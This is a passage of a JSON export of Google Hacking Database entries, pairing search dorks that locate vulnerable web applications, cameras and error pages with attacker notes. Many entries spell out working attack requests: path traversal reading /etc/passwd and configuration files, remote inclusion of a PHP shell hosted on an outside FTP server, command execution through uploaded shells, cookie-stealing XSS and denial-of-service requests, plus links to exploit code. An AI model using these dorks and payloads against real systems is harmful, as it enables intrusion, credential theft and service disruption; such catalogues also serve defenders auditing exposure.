"querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22EZPartner%22+-netpond&btnG=Search", "shortDescription": "intitle:\"EZPartner\" -netpond", "textualDescription": "EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites. This search finds the logins." }, { "signatureReferenceNumber": "1297", "link": "https://www.exploit-db.com/ghdb/1297/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=%22Powered+by+Loudblog%22+&btnG=Cerca+con+Google&meta=", "shortDescription": "\"Powered by Loudblog\"", "textualDescription": "this dork is for the LoudBlog" }, { "signatureReferenceNumber": "1298", "link": "https://www.exploit-db.com/ghdb/1298/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+website+engine+code+is+copyright%22+%222005+by+Clever+Copy%22+-inurl:demo&hl=it&lr=&filter=0", "shortDescription": "\"This website engine code is copyright\" \"2005 by Clever Copy\" -inurl:demo", "textualDescription": "Clever Copy" }, { "signatureReferenceNumber": "1299", "link": "https://www.exploit-db.com/ghdb/1299/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22b2evo+installer%22+intext:%22Installer+f%C3%BCr+Version%22+&hl=it&lr=&start=0&sa=N&filter=0", "shortDescription": "intitle:\"b2evo installer\" intext:\"Installer f\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00bcr Version\"", "textualDescription": "this page lets you to know some interesting info on target machine, database name, username... it lets you to see phpinfo() and, if you know database password, lets you to inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings and launch commands wrote a simple dictionary attack tool fot this: http://retrogod.altervista.org/b2evo_16alpha_bf.html" }, { "signatureReferenceNumber": "1300", "link": "https://www.exploit-db.com/ghdb/1300/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=%22index+of%22+intext%3Afckeditor+inurl%3Afckeditor+&btnG=Cerca+con+Google&meta=", "shortDescription": "\"index of\" intext:fckeditor inurl:fckeditor", "textualDescription": "\"index of\" intext:fckeditor inurl:fckeditor this dork is for FCKEditor scriptthrough editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands... however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html" }, { "signatureReferenceNumber": "1301", "link": "https://www.exploit-db.com/ghdb/1301/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=%22powered+by+runcms%22+-runcms.com+-runcms.org+&btnG=Cerca&lr=", "shortDescription": "\"powered by runcms\" -runcms.com -runcms.org", "textualDescription": "\"powered by runcms\" -runcms.com -runcms.org all versions" }, { "signatureReferenceNumber": "1302", "link": "https://www.exploit-db.com/ghdb/1302/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=(%22This+Dragonfly%E2%84%A2+installation+was%22+%7C+%22Thanks+for+downloading+Dragonfly%22)+-inurl:demo+-inurl:cpgnuke.com&hl=en&lr=&start=20&sa=N", "shortDescription": "(\"This Dragonfly\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 installation was\" | \"Thanks for downloading Dragonfly\") -inurl:demo -inurl:cpgnuke.com", "textualDescription": "exploit and short explaination: http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html" }, { "signatureReferenceNumber": "1303", "link": "https://www.exploit-db.com/ghdb/1303/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:docmgr+%7C+intitle:%22DocMGR%22+%22enter+your+Username+and%22%7C%22und+Passwort+bitte%22%7C%22saisir+votre+nom%22%7C%22su+nombre+de+usuario%22+-ext:pdf+-inurl:%22download.php%22+&hl=en&lr=&filter=0", "shortDescription": "inurl:docmgr | intitle:\"DocMGR\" \"enter your Username and\"|\"und Passwort bitte\"|\"saisir votre nom\"|\"su nombre de usuario\" -ext:pdf -inurl:\"download.php", "textualDescription": "exploit and short explaination: http://retrogod.altervista.org/docmgr_0542_incl_xpl.html" }, { "signatureReferenceNumber": "1304", "link": "https://www.exploit-db.com/ghdb/1304/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%28intitle%3A%22Flyspray+setup%22%7C%22powered+by+flyspray+0.9.7%22%29+-flyspray.rocks.cc+&btnG=Cerca+con+Google&meta=", "shortDescription": "(intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc", "textualDescription": "exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: (intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 by now switch to sql/ directory and search the install-0.9.7.php script explaination link: http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.htmlexploit adjusted for flyspray: http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html" }, { "signatureReferenceNumber": "1305", "link": "https://www.exploit-db.com/ghdb/1305/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22LinPHA+Version%22+intext:%22Have+fun%22+&hl=en&lr=&start=20&sa=N", "shortDescription": "intext:\"LinPHA Version\" intext:\"Have fun\"", "textualDescription": "this is for Linpha" }, { "signatureReferenceNumber": "1306", "link": "https://www.exploit-db.com/ghdb/1306/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=inurl%3Aupdown.php+%7C+intext%3A%22Powered+by+PHP+Uploader+Downloader%22+&btnG=Cerca+con+Google&meta=&num=100", "shortDescription": "inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\"", "textualDescription": "this (evil ) script lets you to upload a php shell on target server, in most cases not password protected dork: inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\" a note: sometimes you don't see a link to a list of uploaded files... just switch to http://[target]/[path]/updown.php?action=download" }, { "signatureReferenceNumber": "1307", "link": "https://www.exploit-db.com/ghdb/1307/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%28%22powered+by+nocc%22+intitle%3A%22NOCC+Webmail%22%29+-site%3Asourceforge.net+-Zoekinalles.nl+-analysis+&meta=&num=100&filter=0", "shortDescription": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "textualDescription": "dork: (\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis software: http://nocc.sourceforge.net/ this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss & possible remote code execution flaws I found: example of arbitrary local inclusion: http://[target]/[path]/html/footer.php?cmd=dir&_SESSION[nocc_theme]=../../../../../../../../../test.php%00 http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=fr&theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test example of commands execution (including an uploaded mail attachment with php code inside, filename is predictable...) http://[target]/[path]/index.php?cmd=dir&lang=../tmp/php331.tmp1140514888.att%00 xss: http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=\">alert(document.cookie) full advisory & poc exploit: http://retrogod.altervista.org/noccw_10_incl_xpl.html" }, { "signatureReferenceNumber": "1308", "link": "https://www.exploit-db.com/ghdb/1308/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22igenus+webmail+login%22&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "intitle:\"igenus webmail login\"", "textualDescription": "intitle:\"igenus webmail login\"example exploit: http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 also, on php5: http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:password@somehost.com&cmd=dir where on somehost.com you have a php shell code in a \".config\" file exploit code: http://retrogod.altervista.org/igenus_202_xpl_pl.html" }, { "signatureReferenceNumber": "1309", "link": "https://www.exploit-db.com/ghdb/1309/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=allintitle%3A%22FirstClass+Login%22+&filter=0", "shortDescription": "allintitle:\"FirstClass Login\"", "textualDescription": "allintitle:\"FirstClass Login\" this is for firstclass directory listingsgo to http://[target]/[path]/Search type just ' in search field and you have a list of downloadable files, you don't see all files on server but you can search for a robots.txt with some folders path or other info for site scructure, crawling in this way you have unauthorized access on all files on the target server" }, { "signatureReferenceNumber": "1310", "link": "https://www.exploit-db.com/ghdb/1310/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+4images%22+&num=100&hl=en&lr=&start=100&sa=N&filter=0", "shortDescription": "\"powered by 4images\"", "textualDescription": "this is for 4images" }, { "signatureReferenceNumber": "1311", "link": "https://www.exploit-db.com/ghdb/1311/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22Powered+By+Geeklog%22+-geeklog.net+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "intext:\"Powered By Geeklog\" -geeklog.net", "textualDescription": "dork: intext:\"Powered By Geeklog\" -geeklog.net this is for the vulnerability discovered by GulfTech research, related stuff: (*) http://www.gulftech.org/?node=research&article_id=00102-02192006 http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 exploit for (*) : http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)" }, { "signatureReferenceNumber": "1312", "link": "https://www.exploit-db.com/ghdb/1312/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=intitle%3Aadmbook+intitle%3Aversion+filetype%3Aphp+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "intitle:admbook intitle:version filetype:php", "textualDescription": "intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.phpperl exploit:http://retrogod.altervista.org/admbook_122_xpl.html" }, { "signatureReferenceNumber": "1313", "link": "https://www.exploit-db.com/ghdb/1313/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=WEBalbum+2004-2006+duda+-ihackstuff+-exploit&num=100&hl=en&lr=&start=200&sa=N&filter=0", "shortDescription": "WEBalbum 2004-2006 duda -ihackstuff -exploit", "textualDescription": "dork: WEBalbum 2004-2006 duda -ihackstuff -exploitsoftware site: http://www.web-album.org/ advisory/ poc exploit: http://retrogod.altervista.org/webalbum_202pl_local_xpl.html" }, { "signatureReferenceNumber": "1314", "link": "https://www.exploit-db.com/ghdb/1314/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.it/search?hl=en&q=intext%3A%22Powered+by+Plogger%21%22+-plogger.org+-ihackstuff+-exploit&num=100&filter=0", "shortDescription": "intext:\"Powered by Plogger!\" -plogger.org -ihackstuff -exploit", "textualDescription": "explaination & exploit: http://retrogod.altervista.org/plogger_b21_sql_xpl.html" }, { "signatureReferenceNumber": "1315", "link": "https://www.exploit-db.com/ghdb/1315/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=it&q=intext%3A%22powered+by+gcards%22+-ihackstuff+-exploit&btnG=Cerca&lr=&filter=0", "shortDescription": "intext:\"powered by gcards\" -ihackstuff -exploit", "textualDescription": "this is for gcards" }, { "signatureReferenceNumber": "1316", "link": "https://www.exploit-db.com/ghdb/1316/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+php+icalendar%22+-ihackstuff+-exploit&num=100&hl=en&lr=&start=100&sa=N&filter=0", "shortDescription": "\"powered by php icalendar\" -ihackstuff -exploit", "textualDescription": "this is for php iCalendar" }, { "signatureReferenceNumber": "1317", "link": "https://www.exploit-db.com/ghdb/1317/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=it&q=%22powered+by+guestbook+script%22+-ihackstuff+-exploit&lr=&filter=0", "shortDescription": "\"powered by guestbook script\" -ihackstuff -exploit", "textualDescription": "poc exploit & explaination: http://retrogod.altervista.org/gbs_17_xpl_pl.html" }, { "signatureReferenceNumber": "1318", "link": "https://www.exploit-db.com/ghdb/1318/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+XHP+CMS%22+-ihackstuff+-exploit+-xhp.targetit.ro&num=100&hl=en&lr=&start=200&sa=N&filter=0", "shortDescription": "\"Powered by XHP CMS\" -ihackstuff -exploit -xhp.targetit.ro", "textualDescription": "tested version: 0.5 without to have admin rights, you can go to: http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php or http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with the usual code inside... after: http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool: http://retrogod.altervista.org/XHP_CMS_05_xpl.html" }, { "signatureReferenceNumber": "1319", "link": "https://www.exploit-db.com/ghdb/1319/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=inurl%3A*.exe+ext%3Aexe+inurl%3A%2F*cgi*%2F&meta=&num=100&filter=0", "shortDescription": "inurl:*.exe ext:exe inurl:/*cgi*/", "textualDescription": "a cgi-bin executables xss/html injection miscellanea:some examples:inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=\">[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=\">[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=\">[XSS HERE]&poi1city=city&poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=\">[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=\">[XSS HERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=\">[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=\">[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=\">[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=\">[XSS HERE]&LIMIT=50&YEAR=\"> inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=\">[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]" }, { "signatureReferenceNumber": "1320", "link": "https://www.exploit-db.com/ghdb/1320/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+claroline%22+-demo&num=100&hl=en&lr=&start=100&sa=N&filter=0", "shortDescription": "\"powered by claroline\" -demo", "textualDescription": "this is for Claroline e-learning platform" }, { "signatureReferenceNumber": "1321", "link": "https://www.exploit-db.com/ghdb/1321/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22PhpCollab+.+Log+In%22+%7C+%22NetOffice+.+Log+In%22+%7C+(intitle:%22index.of.%22+intitle:phpcollab%7Cnetoffice+inurl:phpcollab%7Cnetoffice+-gentoo)+&num=100&hl=en&lr=&start=&sa=N&filter=0", "shortDescription": "\"PhpCollab . Log In\" | \"NetOffice . Log In\" | (intitle:\"index.of.\" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)", "textualDescription": "this is for PhpCollab 2.x / NetOffice 2.x sql injectionhttp://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html" }, { "signatureReferenceNumber": "1322", "link": "https://www.exploit-db.com/ghdb/1322/", "category": "Network or vulnerability data", "querystring": "http://www.google.co.uk/search?hl=en&q=inurl%3A%2Fcounter%2Findex.php+intitle%3A%22%2BPHPCounter+7.*%22&btnG=Google+Search&meta=", "shortDescription": "inurl:/counter/index.php intitle:\"+PHPCounter 7.*\"", "textualDescription": "This is an online vulnerable web stat program called PHPCounter 7.http://www.clydebelt.org.uk/counter/help.html It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure." }, { "signatureReferenceNumber": "1323", "link": "https://www.exploit-db.com/ghdb/1323/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%222000-2001+The+phpHeaven+Team%22+-sourceforge+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "textualDescription": "this is the dork for PHPMyChat" }, { "signatureReferenceNumber": "1324", "link": "https://www.exploit-db.com/ghdb/1324/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%222000-2001+The+phpHeaven+Team%22+-sourceforge+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "\"2004-2005 ReloadCMS Team.\"", "textualDescription": "this is for ReloadCMS" }, { "signatureReferenceNumber": "1325", "link": "https://www.exploit-db.com/ghdb/1325/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22+-sourceforge&num=100&hl=en&lr=&start=0&sa=N&filter=0", "shortDescription": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "textualDescription": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge this is for PHPMyChat remote commands execution,advisory/poc exploits:http://retrogod.altervista.org/phpmychat_0145_xpl.htmlhttp://retrogod.altervista.org/phpmychat_015dev_xpl.html" }, { "signatureReferenceNumber": "1326", "link": "https://www.exploit-db.com/ghdb/1326/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:server.php+ext:php++intext:%22No+SQL%22+-Released&num=100&hl=en&lr=&start=0&sa=N&filter=0", "shortDescription": "inurl:server.php ext:php intext:\"No SQL\" -Released", "textualDescription": "vulnerabilitydiscovered by Secunia, quick reference:http://www.securityfocus.com/bid/16187an example of exploit for PHPOpenChat:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmla DOS exploit:http://retrogod.altervista.org/adodb_dos.html" }, { "signatureReferenceNumber": "1327", "link": "https://www.exploit-db.com/ghdb/1327/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:PHPOpenChat+inurl:%22index.php%3Flanguage%3D%22+&num=100&hl=it&lr=&start=0&sa=N&filter=0", "shortDescription": "intitle:PHPOpenChat inurl:\"index.php?language=\"", "textualDescription": "exploit:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmlalso, information disclosure:http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfoand denial of service on some windows system, multiple requests of:http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog" }, { "signatureReferenceNumber": "1328", "link": "https://www.exploit-db.com/ghdb/1328/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+phplist%22+%7C+inurl%3A%22lists%2F%3Fp%3Dsubscribe%22+%7C+inurl%3A%22lists%2Findex.php%3Fp%3Dsubscribe%22+-ubbi+-bugs+%2Bphplist+-tincan.co.uk", "shortDescription": "\"powered by phplist\" | inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\" -ubbi -bugs +phplist -tincan.co.uk", "textualDescription": "this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html" }, { "signatureReferenceNumber": "1329", "link": "https://www.exploit-db.com/ghdb/1329/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22extras%2Fupdate.php%22+intext%3Amysql.php+-display+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "inurl:\"extras/update.php\" intext:mysql.php -display", "textualDescription": "this is an osCommerce dork:inurl:\"extras/update.php\" intext:mysql.php -display or more simply: inurl:\"extras/update.php\" -display (this display some more hosts where error_reporting=0) I found this simple exploit, if extras/ folder is inside the www path, you can view all files on target system, including php files and so on, ex: http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=../index.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/fstab also, if you succeed to view configure script with database details, you can connect to it trough some test scripts inside this folder...now I read this:http://www.securityfocus.com/bid/14294/infothis is actually unpatched/unresolved in 2.2 on Apr 2006" }, { "signatureReferenceNumber": "1330", "link": "https://www.exploit-db.com/ghdb/1330/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Asysinfo.cgi+ext%3Acgi+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "inurl:sysinfo.cgi ext:cgi", "textualDescription": "dork:inurl:sysinfo.cgi ext:cgi exploit: http://www.milw0rm.com/exploits/1677 I found this command execution vulnerability in 1.2.1 but other versions maybe vulnerable toohowever, u can see version in google results" }, { "signatureReferenceNumber": "1331", "link": "https://www.exploit-db.com/ghdb/1331/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Aperldiver.cgi+ext%3Acgi+&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "inurl:perldiver.cgi ext:cgi", "textualDescription": "dork: inurl:perldiver.cgi ext:cgi some interesting info about server and a cross site scripting vulnerability, poc: http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&alert(\"lol\")other reference:http://secunia.com/advisories/16888/" }, { "signatureReferenceNumber": "1332", "link": "https://www.exploit-db.com/ghdb/1332/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:tmssql.php+ext:php+mssql+pear+adodb++-cvs+-akbk&num=100&hl=en&lr=&start=0&sa=N&filter=0", "shortDescription": "inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk", "textualDescription": "dork:inurl:tmssql.php ext:php mssql pear adodb -cvs -akbka remote user can execute an arbitrary function (without arguments) example: http://[target]/[path]/tmssql.php?do=phpinfo reference:http://www.osvdb.org/displayvuln.php?osvdb_id=22291 I also discovered that you can crash some win boxes / apache servers by sendingmultiple requests of http://[target]/[path]/tmssql.php?do=closelogsee:http://www.milw0rm.com/exploits/1651" }, { "signatureReferenceNumber": "1333", "link": "https://www.exploit-db.com/ghdb/1333/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+php+photo+album%22+%7C+inurl%3A%22main.php%3Fcmd%3Dalbum%22+-demo2+-pitanje+&filter=0", "shortDescription": "\"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje", "textualDescription": "dork: \"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje poc: if register_globals = On & magic_quotes_gpc = Off http://[target]/[path]/language.php?data_dir=/etc/passwd%00 on, php5, if register_globals = on: http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:fakemail.com@somehost.com/public/ where on ftp you have a translation.dat file with shellcode inside references: http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html http://www.securityfocus.com/bid/17526" }, { "signatureReferenceNumber": "1334", "link": "https://www.exploit-db.com/ghdb/1334/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22IVC+Control+Panel%22&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "intitle:\"IVC Control Panel\"", "textualDescription": "this searches for security cameras, vendor site:http://www.ivcco.com/" }, { "signatureReferenceNumber": "1335", "link": "https://www.exploit-db.com/ghdb/1335/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=(intitle:MOBOTIX+intitle:PDAS)+%7C+(intitle:MOBOTIX+intitle:Seiten)+%7C+(inurl:/pda/index.html+%2Bcamera)&num=100&hl=en&lr=&filter=0", "shortDescription": "(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)", "textualDescription": "more cams...vendor site: http://www.mobotix.com/layout/set/index/language/index" }, { "signatureReferenceNumber": "1336", "link": "https://www.exploit-db.com/ghdb/1336/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22MvBlog+powered%22&btnG=H%C4%BEada%C5%A5&meta=&num=100", "shortDescription": "intitle:\"MvBlog powered\"", "textualDescription": "MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.http://www.securityfocus.com/bid/17481/discuss" }, { "signatureReferenceNumber": "1337", "link": "https://www.exploit-db.com/ghdb/1337/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22powered+by+active+php+bookmarks%22+%7C+inurl%3Abookmarks%2Fview_group.php%3Fid%3D&btnG=H%C4%BEada%C5%A5+v+Google&meta=&num=100", "shortDescription": "\"powered by active php bookmarks\" | inurl:bookmarks/view_group.php?id=", "textualDescription": "Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.exploit (i haven't tested it)http://www.securityfocus.com/archive/1/305392my version of exploithttp://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps" }, { "signatureReferenceNumber": "1338", "link": "https://www.exploit-db.com/ghdb/1338/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=Please+enter+a+valid+password%21+inurl%3Apolladmin&btnG=H%C4%BEada%C5%A5&meta=", "shortDescription": "Please enter a valid password! inurl:polladmin", "textualDescription": "The PHP Poll Wizard 2 ist a powerful and easy-to-use PHP-Script for creating and managing polls.more generic dork:\"Powered by PHP Poll Wizard\" | intitle:\"php poll wizard\"" }, { "signatureReferenceNumber": "1339", "link": "https://www.exploit-db.com/ghdb/1339/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&num=100&hl=en&lr=&start=0&sa=N", "shortDescription": "\"Warning: Division by zero in\" \"on line\" -forum", "textualDescription": "Just another error that reveals full paths." }, { "signatureReferenceNumber": "1340", "link": "https://www.exploit-db.com/ghdb/1340/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&num=100&hl=en&lr=&start=0&sa=N", "shortDescription": "inurl:resetcore.php ext:php", "textualDescription": "e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development.rgods exploit:http://retrogod.altervista.org/e107remote.html" }, { "signatureReferenceNumber": "1341", "link": "https://www.exploit-db.com/ghdb/1341/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A+mysql_connect%28%29%3A+Access+denied+for+user%3A+%27*%40*%22+%22on+line%22++-help+-forum&btnG=Search", "shortDescription": "\"Warning: mysql_connect(): Access denied for user: '*@*\" \"on line\" -help -forum", "textualDescription": "This dork reveals logins to databases that were denied for some reason." }, { "signatureReferenceNumber": "1342", "link": "https://www.exploit-db.com/ghdb/1342/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A%22+%22failed+to+open+stream%3A+HTTP+request+failed%22+%22on+line%22+&btnG=Search", "shortDescription": "\"Warning:\" \"failed to open stream: HTTP request failed\" \"on line\"", "textualDescription": "Just another error message." }, { "signatureReferenceNumber": "1343", "link": "https://www.exploit-db.com/ghdb/1343/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A+Bad+arguments+to+%28join%7Cimplode%29+%28%29+in%22+%22on+line%22+-help+-forum&btnG=Search", "shortDescription": "\"Warning: Bad arguments to (join|implode) () in\" \"on line\" -help -forum", "textualDescription": "and another error. open it from cache when not working." }, { 